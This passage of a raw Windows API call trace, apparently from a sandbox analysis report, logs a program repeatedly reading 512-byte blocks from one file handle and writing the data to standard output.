nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.926] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.926] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.928] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.928] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.929] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.930] GetFileType (hFile=0x50) returned 0x1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, 